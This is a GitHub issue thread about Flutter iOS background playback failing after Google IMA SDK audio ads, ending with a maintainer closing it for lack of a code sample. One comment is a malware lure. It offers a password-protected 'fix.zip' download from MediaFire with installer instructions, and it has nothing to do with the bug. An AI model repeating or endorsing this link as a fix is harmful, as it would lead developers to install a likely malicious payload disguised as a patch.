### ISSUE TITLE
Google Ad Manager - Implementing voice ads functionality using IMA SDK causes problems with background playback in iOS apps

### ISSUE THREAD

**Issue by ayumic-c** [flutter/flutter#154224]
### Steps to reproduce

I am currently using Google Ad Manager -  IMA SDK Ver. 3.22.1 to implement the audio ads feature in my radio app, but the iOS app is experiencing the following issues when playing ads in the background.

1. Play an episode in the foreground.
2. Then transition to background.
3. Tap “>>” from the Control Center.
4. Then, an advertisement is played.
5. After the ad ends, the next episode does not play.

### Expected results

I would like to be able to play the next episode after the ad plays in the background.

### Actual results

As described in step 5, the next episode does not play after the ad ends in the background.

### Code sample

N/A

### Screenshots or Video

https://github.com/user-attachments/assets/334d2dbe-f666-4e67-950c-d8c758d25c37

### Logs

[gera_ios_backgroundBugs.csv](https://github.com/user-attachments/files/16775790/gera_ios_backgroundBugs.csv)

### Flutter Doctor output

N/A

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by danagbemava-nc** [comment]
Hi @ayumic-c, are you using the https://pub.dev/packages/interactive_media_ads plugin? If so, it doesn't seem like background audio ads are supported yet, see the note section in the readme. 

Can you also provide a complete minimal reproducible code sample so that we can properly investigate this?

**Comment by ayumic-c** [comment]
Hi, @danagbemava-nc
No, we are not using that plugin.

And, unfortunately I can’t provide a complete minimal reproducible code sample because of our program is very complicated.
Do you have any solutions without the code?

**Comment by danagbemava-nc** [comment]
Unfortunately, without a code sample we can't tell what's wrong and how to solve it. Also, if you're not using the plugin maintained by the flutter team but your own custom implementation, you may want to try with a native iOS sample to see if you get the same behavior, in which case you may want to report it to the library maintainers but if you're using another plugin, you may want to report this to the plugin maintainers. 

Given that you're not using the plugin maintained by the flutter team, there's no further action for us to take here. Closing from here. 

Thank you
